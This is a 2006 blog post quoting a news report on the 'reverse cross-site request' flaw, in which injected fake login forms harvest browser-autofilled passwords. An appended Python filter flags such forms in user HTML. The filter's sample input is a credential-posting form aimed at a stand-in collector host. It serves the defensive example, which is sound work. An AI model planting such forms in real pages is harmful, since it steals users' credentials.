Tuesday, December 05, 2006

Firefox, IE vulnerable to fake login pages...

December 2006

Mozilla's Firefox 2 and Microsoft's Internet Explorer 7 are vulnerable to a flaw that could allow attackers to steal passwords. Dubbed a reverse cross-site request, or RCSR, vulnerability by its discoverer, Robert Chapin, the flaw lets hackers compromise users' passwords and usernames by presenting them with a fake login form. Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services site. An exploit for this flaw has already been seen on social-networking site MySpace.com, and it could affect anyone using a blog or forum that allows user-generated HTML code to be added, according to Chapin.

According to Chapin, an RCSR attack is much more likely to succeed than a cross-site scripting attack because neither Internet Explorer nor Firefox is designed to check the destination of form data before the user submits them. The browser doesn't sound an alarm because the exploit is conducted at the trusted Website.
Source: http://news.com.com/Firefox%2C+IE+vulnerable+to+fake+login+pages/2100_1002_3_6137844.html
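Because the browser does not check where form data goes, a blog or forum that accepts user-generated HTML has to do that check itself before publishing a post. The following is an added example, not code from the article or from Chapin; the function names, `forum.example` and `collector.example` are assumptions made for illustration, and the sample fragment is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a user-submitted fragment and the page it would appear on.
PAGE_URL = "https://forum.example/profile/123"
SAMPLE = (
    '<p>hello</p>'
    '<form action="https://collector.example/save" method="post">'
    '<input name="username"><input type="password" name="password">'
    '</form>'
)

class FormAudit(HTMLParser):
    """Records every <form>: its resolved action URL and whether it holds a password field."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._open = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # A missing or empty action posts back to the hosting page.
            target = urljoin(self.page_url, a.get("action", "").strip())
            self._open = {"action": target, "password_field": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if a.get("type", "").strip().lower() == "password":
                self._open["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def origin(url):
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.netloc.lower())

def audit_user_html(fragment, page_url):
    """Return the forms a moderator or filter should reject in user-supplied HTML."""
    parser = FormAudit(page_url)
    parser.feed(fragment)
    parser.close()
    for form in parser.forms:
        form["off_site"] = origin(form["action"]) != origin(page_url)
    return [f for f in parser.forms if f["password_field"] or f["off_site"]]

if __name__ == "__main__":
    print(audit_user_html(SAMPLE, PAGE_URL))
```

A site with no need for forms in user content can treat any non-empty result as grounds to reject the post or strip the form entirely.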
